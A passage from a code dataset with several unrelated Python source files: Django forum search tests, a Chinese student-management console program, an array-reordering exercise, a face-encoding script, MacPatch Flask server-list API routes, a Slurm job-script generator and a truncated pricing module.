tmp","repo_name":"xiaozuo7/algorithm_python","sub_path":"leetcode_求众数.py","file_name":"leetcode_求众数.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73867148933","text":"from django.test import TestCase\n\nfrom simple_forums.backends.search import SearchResultSet\nfrom simple_forums.tests.testing_utils import create_thread\n\n\nclass TestSearchResultSet(TestCase):\n \"\"\" Test class used to return search results \"\"\"\n\n def test_add(self):\n \"\"\" Test adding a result to the result set.\n\n Adding a thread to the result set with it's score should save\n the thread in the result set.\n \"\"\"\n thread = create_thread()\n result_set = SearchResultSet()\n result_set.add(thread, 0)\n\n self.assertEqual((thread, 0), result_set[0])\n\n def test_add_default_score(self):\n \"\"\" Test adding a result to the result set with no score.\n\n Adding a thread to the result set and not specifying a score\n should set the result's score to 0.\n \"\"\"\n thread = create_thread()\n result_set = SearchResultSet()\n result_set.add(thread)\n\n self.assertEqual((thread, 0), result_set[0])\n\n def test_get_sorted(self):\n \"\"\" Test getting the sorted results.\n\n The results should be ordered by score, descending.\n \"\"\"\n result_set = SearchResultSet()\n result_set.results = [\n (None, 1),\n (None, 0),\n (None, 3),\n ]\n\n expected = [\n (None, 3),\n (None, 1),\n (None, 0),\n ]\n\n self.assertEqual(expected, result_set.get_sorted())\n","repo_name":"cdriehuys/django_simple_forums","sub_path":"simple_forums/tests/test_search_result_set.py","file_name":"test_search_result_set.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"44"} +{"seq_id":"22378484950","text":"#用来保存学生数据\nstu_infos = []\n\ndef print_menu():\n\t#1.打印功能提示\n\n\tprint(\"\\n\")\n\tprint(\"=\"*30)\n\tprint(\"\t学生管理系统v1.o\")\n\tprint(\"1. 添加学生信息\")\n\tprint(\"2. 删除学生信息\")\n\tprint(\"3. 修改学生信息\")\n\tprint(\"4. 查询学生信息\")\n\tprint(\"5. 显示所有学生信息\")\n\tprint(\"6. 保存数据\")\n\tprint(\"0. 退出系统\")\n\tprint(\"=\"*30)\n\tprint(\"\\n\")\n#1 添加学生信息\ndef add_stu_info():\n\n\t#1.1 提示并获取学生的姓名\n\tnew_name = input(\"请输入新学生的名字:\")\n\n\t#1.2 提示并获取学生的性别\n\tnew_sex = input(\"请输入新学生的性别:(男/女)\")\n\t\n\t#1.3 提示并获取学生的手机号\n\tnew_phone = input(\"请输入新学生的手机号码:\")\n\t\n\tnew_info = {}\n\tnew_info['name'] = new_name\n\tnew_info['sex'] = new_sex\n\tnew_info['phone'] = new_phone\n\n\tstu_infos.append(new_info)\n\t\n#2 删除指定的学生信息\ndef del_stu_info():\n\t#调用函数4实现查找功能\n\td_flag,d_i = search_stu_info()\n\tif d_flag==1:\n\t\ty_n = input(\"请确认是否删除以上信息y/n:\")\n\t\tif y_n==\"y\":\n\t\t\tdel stu_infos[d_i-1]\n\n#3 更改学生信息\ndef change_stu_info():\n\t#3.1 提示并获取需要修改的学生序号\n\tstu_ID =int(input(\"请输入要修改的学生的序号:\"))\n\n\t#3.2 重新输入学生的信息(姓名,性别,手机号码)\n\t#3.1.1 提示并获取学生的姓名\n\tnew_name = input(\"请输入新学生的名字:\")\n\n\t#3.1.2 提示并获取学生的性别\n\tnew_sex = input(\"请输入新学生的性别:(男/女)\")\n\t\n\t#3.1.3 提示并获取学生的手机号\n\tnew_phone = input(\"请输入新学生的手机号码:\")\n\t\n\tstu_infos[stu_ID-1]['name'] = new_name\n\tstu_infos[stu_ID-1]['sex'] = new_sex\n\tstu_infos[stu_ID-1]['phone'] = new_phone\n\n#4 查找学生信息\ndef search_stu_info():\n\tsearch_name = input(\"请输入要查询或删除的学生名字:\")\n\t#4.1 标志位清零\n\tflag = 0\n\tstu_ID=1\n\t#4.2 遍历所有stu_info\n\ti = 0\n\tfor temp_info in stu_infos:\n\t\t#4.3 查询成功,标志位置1,显示该生信息\n\t\tif temp_info['name']==search_name:\n\t\t\tflag = 1\n\t\t\tprint(\"=\"*30)\n\t\t\tprint(\"该生信息如下:\")\n\t\t\tprint(\"=\"*30)\n\t\t\tprint(\"序号\t姓名\t性别\t手机号码\")\n\t\t\tprint(\"%d\t%s\t%s\t%s\"%(stu_ID,temp_info['name'],temp_info['sex'],temp_info['phone']))\n\t\t\ti =int(stu_ID)\n\t\t\treturn flag,i\n\t\t#4.4 跳出循环之前,stu_ID+1\n\t\tstu_ID+=1\n\tif flag==0:\n\t\tprint(\"查无此人\")\n\t\treturn flag,i\n#5 显示所有学生信息\ndef print_stu_info():\n\tprint(\"=\"*30)\n\tprint(\"学生的信息如下:\")\n\tprint(\"=\"*30)\n\n\tprint(\"序号\t姓名\t性别\t手机号码\")\n\ti = 1\n\tfor temp_info in stu_infos:\n\t\tprint(\"%d\t%s\t%s\t%s\"%(i,temp_info['name'],temp_info['sex'],temp_info['phone']))\n\t\ti+=1\n\t\t\n#6 保存当前所有的学生信息到文件中\ndef save2file():\n\tf = open(\"backup.data\",\"w\")\n\ttemp = str(stu_infos) \n\tf.write(temp)\t\n\t\n\tf.close()\n\tprint(\"数据已保存\")\n\n#恢复数据函数\ndef backup_data():\n\tglobal stu_infos\n\tf = open(\"backup.data\")\n\tcontent = f.read()\n\ttemp = eval(content)\n\tstu_infos = temp\n\tf.close()\n\n#\tprint(stu_infos)\n#\ta = str(type(stu_infos))\n#\tprint(a)\n\ndef main():\n\t#设置flag,标识退出时数据是否需要保存\n\tf_save_file = True\n\t#恢复上次的数据\n\tbackup_data()\n\twhile True:\n\t\t#设置flag,标识退出时数据是否需要保存\n\t\tf_save_file = True\n\t\t#1.打印功能提示\n\t\tprint_menu()\n\n\t\t#获取功能的选择\n\t\tkey = input(\"请输入功能对应的数字: \")\n\t\tprint(\"\\n\")\n\t\t#根据用户的选择,进行相应的操作\n\t\t\n\t\tif key==\"1\":\n\t\t\t#1 添加学生信息\n\t\t\tadd_stu_info()\n\t\telif key=='2':\n\t\t\t#2 删除学生信息\n\t\t\tdel_stu_info()\n\t\telif key=='3':\n\t\t\t#3 修改学生的信息\n\t\t\tchange_stu_info()\n\t\telif key=='4':\n\t\t\t#4 查询学生信息\n\t\t\tsearch_stu_info()\n\t\telif key=='5':\n\t\t\t#5 print(stu_infos)\n\t\t\tprint_stu_info()\t\n\t\telif key=='6':\n\t\t\t#6 保存数据到文件中\n\t\t\tf_save_file = False\n\t\t\tsave2file()\n\t\t\t#print(\"数据已保存\")\n\t\telif key=='0':\n\t\t\tbreak\n\tif f_save_file:\n\t\tsave2file()\nmain()\n","repo_name":"A201124253/Hello-world","sub_path":"05-文件操作/10-学生管理系统-文件版.py","file_name":"10-学生管理系统-文件版.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17962699217","text":"#!/usr/local/anaconda3/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\n输入一个整数数组,实现一个函数来调整��数组中数字的顺序,使得所有的奇数位于数组的前半部分,\n所有的偶数位于数组的后半部分,并保证奇数和奇数,偶数和偶数之间的相对位置不变。\n\n\n思路一: 空间换时间 建两个数组对号入座\n思路二: 冒泡排序思想,设立Flag判断什么时候交换\n@author: xiaozuo\n\"\"\"\n# class Solution:\n# def reOrderArray(self, array):\n# # write code here\n# n = len(array)\n# res = []\n# tmp = []\n# for i in array[:]:\n# if i % 2 == 0:\n# res.append(i)\n# else:\n# tmp.append(i)\n# return tmp+res\n\n\nclass Solution:\n def reOrderArray(self, array):\n for i in range(len(array)):\n flag = False\n for j in range(len(array) - 1, i, -1):\n\n if array[j] % 2 == 1 and array[j - 1] % 2 == 0:\n array[j], array[j-1] = array[j-1], array[j]\n flag = True\n if flag == False:\n break\n return array\n\nif __name__ == '__main__':\n sol = Solution()\n array = [1,2,3,4,5,6]\n print(sol.reOrderArray(array=array))","repo_name":"xiaozuo7/algorithm_python","sub_path":"offer/reOrderArray.py","file_name":"reOrderArray.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71282501572","text":"# -*- coding: utf-8 -*-\nimport os\nimport pickle\nimport posixpath\nimport re\n\nimport numpy as np\n\nimport Faces\n\nFACES_FOLDER = \"./stdface/\"\nNUM_JITTERS = 1 # 获取图像编码时抖动次数\n\n\ndef image_files_in_folder(folder):\n # 统一使用unix的/分隔符\n return [posixpath.join(folder, f_) for f_ in os.listdir(folder) if re.match(r'.*\\.(jpg|jpeg|png)', f_, flags=re.I)]\n\n\nid_list = []\nface_encodings = []\n\nprint(\"---开始读取文件---\")\nfor directory in os.listdir(FACES_FOLDER):\n print(\"[ ]开始处理文件夹{}\".format(directory))\n directory_path = posixpath.join(FACES_FOLDER, directory)\n\n for file in image_files_in_folder(directory_path):\n basename = os.path.splitext(os.path.basename(file))[0]\n print(\"[ ]正在处理图片{}\".format(file.split('/')[-1]))\n image = Faces.load_image_file(file)\n top, right, bottom, left = 0, 255, 255, 0\n # top, right, bottom, left = Faces.get_only_face(image, min_face_area=1000, upsample=2)\n # print(\"[+]人脸位置\", (top, right, bottom, left))\n \n encoding = Faces.face_encodings(image, [(top, right, bottom, left)], NUM_JITTERS)\n id_list.append(int(directory))\n face_encodings.append(encoding)\n\n \n# 对face_encodings做整形处理 整理成(n, 128)的形式\nlength = len(id_list)\nnp_face_encodings = np.asarray(face_encodings)\nnp_face_encodings = np_face_encodings.reshape(length, -1)\n\n# 结果以pickle的形式保存到本地\nprint(\"[+]检测结束,开始保存结果\")\nwith open(\"./data/id_list.data\", \"wb\") as f:\n pickle.dump(id_list, f)\n\nwith open(\"./data/face_encodings.data\", \"wb\") as f:\n pickle.dump(np_face_encodings, f)\nprint(\"[+]保存成功\")\n","repo_name":"iszhyang/face_recognition","sub_path":"Faces/get_encodings.py","file_name":"get_encodings.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"42297036404","text":"from flask import request\nfrom flask_restful import reqparse\nfrom sqlalchemy.exc import IntegrityError\n\nfrom . import *\nfrom .. import db\nfrom .. mputil import *\nfrom .. model import *\nfrom .. mplogger import *\n\nparser = reqparse.RequestParser()\n\nclass SUSCatalogs(MPResource):\n\tdef __init__(self):\n\t\tself.reqparse = reqparse.RequestParser()\n\t\tsuper(SUSCatalogs, self).__init__()\n\n\tdef get(self, cuuid, osminor, osmajor=\"10\"):\n\n\t\ttry:\n\t\t\tif not isValidClientID(cuuid):\n\t\t\t\tlog_Error('[SUSCatalogs][Get]: Failed to verify ClientID (%s)' % (cuuid))\n\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify ClientID'}, 424\n\n\t\t\tif not isValidSignature(self.req_signature, cuuid, self.req_uri, self.req_ts):\n\t\t\t\tif current_app.config['ALLOW_MIXED_SIGNATURES']:\n\t\t\t\t\tlog_Info('[SUSCatalogs][Get]: ALLOW_MIXED_SIGNATURES is enabled.')\n\t\t\t\telse:\n\t\t\t\t\tlog_Error('[SUSCatalogs][Get]: Failed to verify Signature for client (%s)' % (cuuid))\n\t\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify Signature'}, 424\n\n\t\t\tq_catalogs = MpAsusCatalog.query.filter(MpAsusCatalog.os_major == int(osmajor),\n\t\t\t\t\t\t\t\t\t\t\t\t\tMpAsusCatalog.os_minor == int(osminor)).order_by(MpAsusCatalog.c_order.asc()).all()\n\n\t\t\t# CatalogURLS\n\t\t\t# ProxyCatalogURLS\n\t\t\t_errorno = 500\n\t\t\t_result = 404\n\t\t\tcatalogs = {}\n\t\t\tcats = []\n\t\t\tproxy_cats = []\n\n\t\t\tif catalogs is not None:\n\t\t\t\tif len(q_catalogs) >= 1:\n\t\t\t\t\tfor row in q_catalogs:\n\t\t\t\t\t\tif row.proxy == 0:\n\t\t\t\t\t\t\tcats.append(row.catalog_url)\n\t\t\t\t\t\telif row.proxy == 1:\n\t\t\t\t\t\t\tproxy_cats.append(row.catalog_url)\n\n\t\t\t\t\tcatalogs['CatalogURLS'] = cats\n\t\t\t\t\tcatalogs['ProxyCatalogURLS'] = proxy_cats\n\t\t\t\t\t_errorno = 0\n\t\t\t\t\t_result = 200\n\t\t\t\telse:\n\t\t\t\t\tlog_Error('[SUSCatalogs][Get][%s]: Error no sus catalogs found.' % (cuuid))\n\t\t\t\t\t_errorno = 404\n\t\t\telse:\n\t\t\t\tlog_Error('[SUSCatalogs][Get][%s]: Error no catalogs found.' % (cuuid))\n\n\t\t\treturn {'errorno': _errorno, 'errormsg': '', 'result': catalogs}, _result\n\n\t\texcept Exception as e:\n\t\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\t\tmessage=str(e.args[0]).encode(\"utf-8\")\n\t\t\tlog_Error('[SUSCatalogs][Get][Exception][Line: {}] CUUID: {} Message: {}'.format(exc_tb.tb_lineno, cuuid, message))\n\t\t\treturn {'errorno': 500, 'errormsg': message, 'result': {}}, 500\n\nclass SUServerList(MPResource):\n\tdef __init__(self):\n\t\tself.reqparse = reqparse.RequestParser()\n\t\tsuper(SUServerList, self).__init__()\n\n\tdef get(self, cuuid, osminor, osmajor=\"10\"):\n\n\t\ttry:\n\t\t\tif not isValidClientID(cuuid):\n\t\t\t\tlog_Error('[SUServerList][Get]: Failed to verify ClientID (%s)' % (cuuid))\n\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify ClientID'}, 424\n\n\t\t\tif not isValidSignature(self.req_signature, cuuid, self.req_uri, self.req_ts):\n\t\t\t\tif current_app.config['ALLOW_MIXED_SIGNATURES']:\n\t\t\t\t\tlog_Info('[SUServerList][Get]: ALLOW_MIXED_SIGNATURES is enabled.')\n\t\t\t\telse:\n\t\t\t\t\tlog_Error('[SUServerList][Get]: Failed to verify Signature for client (%s)' % (cuuid))\n\t\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify Signature'}, 424\n\n\t\t\t_osver = '{}.{}'.format(osmajor, osminor)\n\t\t\t_serverObj = ServerInfo()\n\t\t\t_serverObj = suServerListForID(1,_osver)\n\n\t\t\tlog_Debug('[SUServerList][Get] CUUID: %s Result: %s' % (cuuid, _serverObj.struct()))\n\t\t\treturn {'errorno': 0, 'errormsg': '', 'result': _serverObj.struct()}, 200\n\n\t\texcept Exception as e:\n\t\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\t\tmessage=str(e.args[0]).encode(\"utf-8\")\n\t\t\tlog_Error('[SUServerList][Get][Exception][Line: {}] CUUID: {} Message: {}'.format(exc_tb.tb_lineno, cuuid, message))\n\t\t\treturn {'errorno': 500, 'errormsg': message, 'result': {}}, 500\n\nclass SUSListVersion(MPResource):\n\tdef __init__(self):\n\t\tself.reqparse = reqparse.RequestParser()\n\t\tsuper(SUSListVersion, self).__init__()\n\n\tdef get(self, cuuid=None, list_id=1):\n\n\t\ttry:\n\t\t\tif not isValidClientID(cuuid):\n\t\t\t\tlog_Error('[SUSListVersion][Get]: Failed to verify ClientID (%s)' % (cuuid))\n\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify ClientID'}, 424\n\n\t\t\tif not isValidSignature(self.req_signature, cuuid, self.req_uri, self.req_ts):\n\t\t\t\tif current_app.config['ALLOW_MIXED_SIGNATURES']:\n\t\t\t\t\tlog_Info('[SUSListVersion][Get]: ALLOW_MIXED_SIGNATURES is enabled.')\n\t\t\t\telse:\n\t\t\t\t\tlog_Error('[SUSListVersion][Get]: Failed to verify Signature for client (%s)' % (cuuid))\n\t\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify Signature'}, 424\n\n\t\t\t_result = 404\n\t\t\t_server = {\"version\": 0, \"listid\": 0}\n\n\t\t\tlog_Debug(\"[SUSListVersion][Get][%s]: Getting SUS Catalog list using id (%s)\" % (cuuid, list_id))\n\t\t\tq_result = MpAsusCatalogList.query.filter(MpAsusCatalogList.listid == list_id).first()\n\t\t\tif q_result is not None:\n\t\t\t\t_server['version'] = q_result.version\n\t\t\t\t_server['listid'] = q_result.listid\n\t\t\t\t_result = 200\n\t\t\telse:\n\t\t\t\tlog_Warn('[SUSListVersion][Get][%s]: No list found for list id (%s)' % (cuuid, list_id))\n\n\t\t\treturn {'errorno': '0', 'errormsg': '', 'result': _server}, _result\n\n\t\texcept Exception as e:\n\t\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\t\tmessage=str(e.args[0]).encode(\"utf-8\")\n\t\t\tlog_Error('[SUSListVersion][Get][Exception][Line: {}] CUUID: {} Message: {}'.format(exc_tb.tb_lineno, cuuid, message))\n\t\t\treturn {'errorno': 500, 'errormsg': message, 'result': {}}, 500\n\nclass ServerList(MPResource):\n\tdef __init__(self):\n\t\tself.reqparse = reqparse.RequestParser()\n\t\tsuper(ServerList, self).__init__()\n\n\tdef get(self, cuuid, list_id=1):\n\n\t\ttry:\n\t\t\tif not isValidClientID(cuuid):\n\t\t\t\tlog_Error('[ServerList][Get]: Failed to verify ClientID (%s)' % (cuuid))\n\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify ClientID'}, 424\n\n\t\t\tif not isValidSignature(self.req_signature, cuuid, self.req_uri, self.req_ts):\n\t\t\t\tif current_app.config['ALLOW_MIXED_SIGNATURES']:\n\t\t\t\t\tlog_Info('[ServerList][Get]: ALLOW_MIXED_SIGNATURES is enabled.')\n\t\t\t\telse:\n\t\t\t\t\tlog_Error('[ServerList][Get]: Failed to verify Signature for client (%s)' % (cuuid))\n\t\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify Signature'}, 424\n\n\t\t\t_serverObj = serverListForID(list_id)\n\n\t\t\tif _serverObj is not None:\n\t\t\t\treturn {'errorno': '0', 'errormsg': '', 'result': _serverObj.struct()}, 200\n\n\t\t\t# No Result\n\t\t\tlog_Error('[ServerList][Get][%s]: Server List Not Found for id (%d)' % (cuuid, list_id))\n\t\t\treturn {'errorno': 404, 'errormsg': 'Server List Not Found', 'result': {}}, 404\n\n\t\texcept Exception as e:\n\t\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\t\tmessage=str(e.args[0]).encode(\"utf-8\")\n\t\t\tlog_Error('[ServerList][Get][Exception][Line: {}] CUUID: {} Message: {}'.format(exc_tb.tb_lineno, cuuid, message))\n\t\t\treturn {'errorno': 500, 'errormsg': message, 'result': {}}, 500\n\nclass ServerListVersion(MPResource):\n\tdef __init__(self):\n\t\tself.reqparse = reqparse.RequestParser()\n\t\tsuper(ServerListVersion, self).__init__()\n\n\tdef get(self, cuuid=None, list_id=1):\n\n\t\ttry:\n\t\t\tif not isValidClientID(cuuid):\n\t\t\t\tlog_Error('[ServerListVersion][Get]: Failed to verify ClientID (%s)' % (cuuid))\n\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify ClientID'}, 424\n\n\t\t\tif not isValidSignature(self.req_signature, cuuid, self.req_uri, self.req_ts):\n\t\t\t\tif current_app.config['ALLOW_MIXED_SIGNATURES']:\n\t\t\t\t\tlog_Info('[ServerListVersion][Get]: ALLOW_MIXED_SIGNATURES is enabled.')\n\t\t\t\telse:\n\t\t\t\t\tlog_Error('[ServerListVersion][Get]: Failed to verify Signature for client (%s)' % (cuuid))\n\t\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify Signature'}, 424\n\n\t\t\t_result = 404\n\t\t\t_server = {\"version\": 0, \"listid\": 0}\n\n\t\t\tq_result = MpServerList.query.filter(MpServerList.listid == list_id).first()\n\t\t\tif q_result is not None:\n\t\t\t\t_server['version'] = q_result.version\n\t\t\t\t_server['listid'] = q_result.listid\n\t\t\t\t_result = 200\n\t\t\telse:\n\t\t\t\tlog_Warn('[ServerListVersion][Get][%s]: No list found for list id (%d)' % (cuuid, list_id))\n\n\t\t\treturn {'errorno': '0', 'errormsg': '', 'result': _server}, _result\n\n\t\texcept Exception as e:\n\t\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\t\tmessage=str(e.args[0]).encode(\"utf-8\")\n\t\t\tlog_Error('[ServerListVersion][Get][Exception][Line: {}] CUUID: {} Message: {}'.format(exc_tb.tb_lineno, cuuid, message))\n\t\t\treturn {'errorno': 500, 'errormsg': message, 'result': {}}, 500\n\n''' ------------------------------- '''\n''' NOT A WEB SERVICE CLASS '''\n\ndef suServerListForID(list_id, os_ver):\n\n\t_serverObj = ServerInfo()\n\t_serverList = []\n\n\tosver = os_ver.split('.')\n\n\tq_catalog_list = MpAsusCatalogList.query.filter(MpAsusCatalogList.listid == list_id).first()\n\n\tif q_catalog_list is not None:\n\t\tq_cats = MpAsusCatalog.query.filter(MpAsusCatalog.os_major == int(osver[0]), MpAsusCatalog.os_minor == int(osver[1])).order_by(\n\t\t\tMpAsusCatalog.c_order.asc()).all()\n\n\t\t_serverObj.id = q_catalog_list.listid\n\t\t_serverObj.name = q_catalog_list.name\n\t\t_serverObj.version = q_catalog_list.version\n\telse:\n\t\t_serverObj.id = ''\n\t\t_serverObj.name = 'NA'\n\t\t_serverObj.version = '0'\n\n\t_catalog = {'os': osver[1], 'servers': []}\n\t_server_dict = {}\n\tif q_cats is not None:\n\t\tfor row in q_cats:\n\t\t\tif row.proxy == 1:\n\t\t\t\t_server_dict = {'CatalogURL': row.catalog_url, 'serverType': 1}\n\t\t\telse:\n\t\t\t\t_server_dict = {'CatalogURL': row.catalog_url, 'serverType': 0}\n\n\t\t\t_serverList.append(_server_dict)\n\t\t# Add the to the os version list dict\n\t\t_catalog['servers'] = _serverList\n\n\t# Add OS vesion servers array to main Dict\n\t_serverObj.servers = [_catalog]\n\n\treturn _serverObj\n\ndef serverListForID(list_id):\n\n\t_serverObj = ServerInfo()\n\t_serverList = []\n\n\tq_result = MpServerList.query.filter(MpServerList.name == \"Default\", MpServerList.listid == list_id).first()\n\n\tif q_result is not None:\n\t\tsetattr(_serverObj, \"name\", q_result.name)\n\t\tsetattr(_serverObj, \"version\", q_result.version)\n\t\tsetattr(_serverObj, \"id\", q_result.listid)\n\n\t\tq_servers_result = MpServer.query.filter(MpServer.active == 1, MpServer.listid == list_id).all()\n\t\tif q_servers_result is not None:\n\t\t\tfor row in q_servers_result:\n\t\t\t\t_srvObj = Server()\n\t\t\t\t_server_dict = _srvObj.importFromRowReturnDictionary(row.asDict)\n\t\t\t\t_serverList.append(_server_dict)\n\n\t\t\tsetattr(_serverObj, \"servers\", _serverList)\n\n\t\treturn _serverObj\n\n\telse:\n\t\treturn None\n\nclass ServerInfo(object):\n\tdef __init__(self):\n\t\tself.name = \"Default\"\n\t\tself.version = \"0\"\n\t\tself.id = \"NA\"\n\t\tself.servers = []\n\n\tdef struct(self):\n\t\treturn (self.__dict__)\n\n\tdef keys(self):\n\t\treturn list(self.__dict__.keys())\n\nclass Server(object):\n\tdef __init__(self):\n\t\tself.host = \"localhost\"\n\t\tself.port = \"2600\"\n\t\tself.useHTTPS = 1\n\t\tself.allowSelfSigned = 0\n\t\tself.useTLSAuth = 0\n\t\tself.serverType = 0\n\n\tdef struct(self):\n\t\treturn (self.__dict__)\n\n\tdef keys(self):\n\t\treturn list(self.__dict__.keys())\n\n\tdef importFromRowReturnDictionary(self, row):\n\t\t_my_keys = ['host', 'port', 'useHTTPS', 'allowSelfSigned', 'useTLSAuth']\n\t\t_keys = ['server', 'port', 'useSSL', 'allowSelfSignedCert', 'useSSLAuth']\n\n\t\tfor idx, key in enumerate(_my_keys):\n\t\t\tsetattr(self, key, row[_keys[idx]])\n\n\t\tif int(row['isMaster']) == 1:\n\t\t\tself.serverType = 0\n\t\telse:\n\t\t\tif int(row['isMaster']) == 0 and int(row['isProxy']) == 0:\n\t\t\t\tself.serverType = 1\n\t\t\telif int(row['isMaster']) == 0 and int(row['isProxy']) == 1:\n\t\t\t\tself.serverType = 2\n\n\t\treturn self.struct()\n\n# Add Routes Resources\n# Old\nservers_api.add_resource(SUSCatalogs, '/sus/catalogs/<string:osminor>/<string:cuuid>', endpoint='susUsingMinor')\nservers_api.add_resource(SUSCatalogs, '/sus/catalogs/<string:osmajor>/<string:osminor>/<string:cuuid>', endpoint='susUsingMajorMinor')\n# New\nservers_api.add_resource(SUSListVersion, '/sus/list/version/<string:cuuid>/<int:list_id>')\nservers_api.add_resource(SUServerList, '/sus/catalogs/list/<string:osminor>/<string:cuuid>', endpoint='asusUsingMinor')\nservers_api.add_resource(SUServerList, '/sus/catalogs/list/<string:osmajor>/<string:osminor>/<string:cuuid>', endpoint='asusUsingMajorMinor')\n\nservers_api.add_resource(ServerList, '/server/list/<string:cuuid>')\nservers_api.add_resource(ServerList, '/server/list/<int:list_id>/<string:cuuid>', endpoint='srvListWithID')\n\nservers_api.add_resource(ServerListVersion, '/server/list/version/<string:cuuid>', endpoint='srvListVerWithClientID')\nservers_api.add_resource(ServerListVersion, '/server/list/version/<int:list_id>/<string:cuuid>', endpoint='srvListVerWithID')\n","repo_name":"LLNL/MacPatch","sub_path":"Source/Server/apps/mpapi/servers/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":12334,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"44"} +{"seq_id":"18894708904","text":"#!/usr/bin/python\n\nimport argparse\nimport getpass\nimport sys\nimport os.path\nfrom subprocess import call\n\n# Configure argument parser\nparser = argparse.ArgumentParser()\nparser.add_argument(\n \"-p\", \"--ntasks\", type=int, default=1, help=\"number of cores per node, default is 1\"\n)\nparser.add_argument(\n \"-n\", \"--nodes\", type=int, default=1, help=\"number of nodes, default is 1\"\n)\nparser.add_argument(\n \"-c\", \"--cpus\", type=int, default=1, help=\"number of cpus per task, default is 1\"\n)\nparser.add_argument(\n \"-t\",\n \"--time\",\n type=int,\n default=10,\n help=\"expected running time in seconds, default is 10\",\n)\nparser.add_argument(\n \"-o\",\n \"--output\",\n type=str,\n default=\"\",\n help=\"the *.out file, default is `execution_file_name`.out\",\n)\nparser.add_argument(\n \"-u\", \"--user\", type=str, default=\"\", help=\"user name, default is the current user\"\n)\nparser.add_argument(\n \"-i\",\n \"--input_file\",\n type=str,\n default=\"\",\n help=\"the input file like *.in, default is none\",\n)\nparser.add_argument(\n \"-s\", \"--output_sl\", type=str, default=\"\", help=\"the *.sl file to build\"\n)\nparser.add_argument(\n \"-g\", \"--gpus\", type=int, default=0, help=\"number of gpus, default is 0\"\n)\nparser.add_argument(\n \"--command\", type=str, default=\"srun\", help=\"run command, default is srun\"\n)\nparser.add_argument(\n \"--args\", type=str, default=\"\", help=\"other argument for the program\"\n)\nparser.add_argument(\"file\", type=str, help=\"the execution file\")\n\n# Parse and initialize arguments`\nargs = parser.parse_args()\nif args.output == \"\":\n args.output = args.file + \".out\"\nif args.user == \"\":\n args.user = getpass.getuser()\nif args.output_sl == \"\":\n args.output_sl = args.file + \".sl\"\nif args.command == \"srun\" or args.command == \"mpirun\":\n args.command += \" -n $SLURM_NTASKS\"\n\n# Exit if the file provided does not exist\nif not os.path.exists(args.file):\n sys.exit(\"{} does not exist!\".format(args.file))\nif args.input_file != \"\" and not os.path.exists(args.input_file):\n sys.exit(\"{} does not exist!\".format(args.input_file))\n\n# Build *.sl file\nwith open(args.output_sl, \"w\") as f:\n f.write(\"#!/bin/bash\\n\")\n f.write(\"#SBATCH --ntasks-per-node={}\\n\".format(args.ntasks))\n f.write(\"#SBATCH --nodes={}\\n\".format(args.nodes))\n f.write(\"#SBATCH --cpus-per-task={}\\n\".format(args.cpus))\n if args.gpus != 0:\n f.write(\"#SBATCH --gres=gpu:{}\\n\".format(args.gpus))\n f.write(\n \"#SBATCH --time={}:{}:{}\\n\".format(\n str(args.time // 3600).zfill(2),\n str(args.time // 60 % 60).zfill(2),\n str(args.time % 60).zfill(2),\n )\n )\n f.write(\"#SBATCH --output={}\\n\".format(args.output))\n f.write(\"#SBATCH -A lc_an2\\n\")\n f.write(\"WORK_HOME=/home/rcf-proj/an2/{}\\n\".format(args.user))\n # f.write(\"cd $WORK_HOME\\n\")\n srun_command = \"{} {} {}\".format(args.command, args.file, args.args)\n if args.input_file != \"\":\n srun_command += \" < {}\".format(args.input_file)\n f.write(srun_command)\n\n# Submit the job\ncall([\"sbatch\", args.output_sl])\n","repo_name":"dalegebit/sgo","sub_path":"sgo.py","file_name":"sgo.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"69803224455","text":"from django.db.models import Q\n\nfrom sellmo import modules\nfrom sellmo.core.local import get_context\nfrom sellmo.api.decorators import link\nfrom sellmo.api.pricing import Price\n\n\nnamespace = modules.pricing.namespace\n\n\n@link()\ndef retrieve(stampable, prop, price=None, **kwargs):\n field = '{0}_discount_discount'.format(prop)\n discount_id = getattr(stampable, '{0}_id'.format(field), None)\n if discount_id is not None:\n context = get_context()\n discounts = context.get('discounts', {})\n if not discount_id in discounts:\n # Query now\n discounts[discount_id] = getattr(stampable, field)\n context['discounts'] = discounts\n price.context['discount'] = discounts[discount_id]\n return {\n 'price': price\n }\n\n\n@link()\ndef stamp(stampable, prop, price, **kwargs):\n if 'discount' in price.context:\n field = '{0}_discount_discount'.format(prop)\n setattr(stampable, field, price.context['discount'])\n\n\n@link(namespace=modules.product.namespace, capture=True)\ndef list(request, discount_group=None, **kwargs):\n if discount_group is None:\n customer = modules.customer.get_customer(request=request)\n if customer and customer.is_authenticated():\n discount_group = 